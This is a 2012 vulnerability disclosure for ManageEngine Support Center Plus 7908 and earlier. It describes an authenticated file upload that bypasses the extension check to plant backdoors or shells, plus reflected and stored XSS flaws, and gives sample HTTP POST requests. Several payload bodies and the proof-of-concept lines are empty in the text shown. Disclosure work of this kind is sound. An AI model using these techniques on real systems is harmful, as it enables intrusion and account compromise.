# Exploit Title : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities
# Date : 06-03-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site : http://www.manageengine.com/
# Version : 7908 and lower
# Tested on : CentOS 5.x
1) Arbitrary File Upload (File Extension Verification Bypass)
It's possible to bypass the image extension check in the ticket creation editor. Normally you would go to Requests -> New Request -> select the "Insert Image" to upload a picture to be included in the ticket and is restricted to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder url you'll be able to upload any file. This might lead to uploading web site files which could be used for malicious actions (backdoors/shells).
Below a sample POST request, note that a valid cookie is needed (and be authenticated) to perform these actions. The POST request uploads a file test.txt with the contents "TEST!"
POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 231
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Length: 231
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif
In the HTTP response you'll see this:
Which makes the following url accessable and will show the "TEST!" in clear text:
2) Reflected XSS
Proof of Concept:
3) Stored XSS vulnerability
How to replicate:
Requests -> New Request
Subject: anything
Description window -> select Edit HTML button -> Insert script code i.e.:
POST request headers:
POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312